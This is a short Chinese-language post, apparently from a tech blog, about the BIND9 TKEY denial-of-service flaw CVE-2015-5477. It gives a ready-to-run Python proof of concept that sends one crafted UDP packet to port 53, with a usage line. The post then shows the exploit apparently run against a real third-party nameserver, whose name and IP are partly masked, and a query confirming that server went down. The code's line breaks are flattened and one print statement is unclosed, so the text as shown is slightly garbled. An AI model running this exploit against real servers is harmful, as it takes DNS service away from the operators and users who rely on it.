一个数据包消灭一台服务器的DNS漏洞
0x01 漏洞详情
ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套DNS域名解析服务软件。该软件被披露存在拒绝服务漏洞,由于TKEY查询的错误可导致BIND服务器发生REQUIRE断言失败并停止服务,攻击者利用漏洞可恶意构造数据包,导致TKEY记录查询错误,进而导致BIND服务器发生REQUIRE断言失败并停止服务。CNVD对该漏洞的综合评级为“高危”0x02 DNS查询
dig X.cn
**以ns1.6.cn为测试对象**:
dig @nsX.X.cn X.cn
其中ns1.X.cn. 1800 IN A 122.X.X.X0x03 利用POC**(****CVE-2015-5477****)**:\#!/usr/bin/env pythonimport socketimport sysprint('CVE-2015-5477 BIND9 TKEY PoC'if len(sys.argv) < 2:print('Usage: ' + sys.argv[0] + ' [target]')sys.exit(1)print('Sending packet to ' + sys.argv[1] + ' ...')payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.sendto(payload, (sys.argv[1], 53))print('Done.')
**使用方式**:python dos.py 122.X.X.X
**再次查询**:dig @ns1.X.cn X.cn已经拒绝服务了
领取专属 10元无门槛券
私享最新 技术干货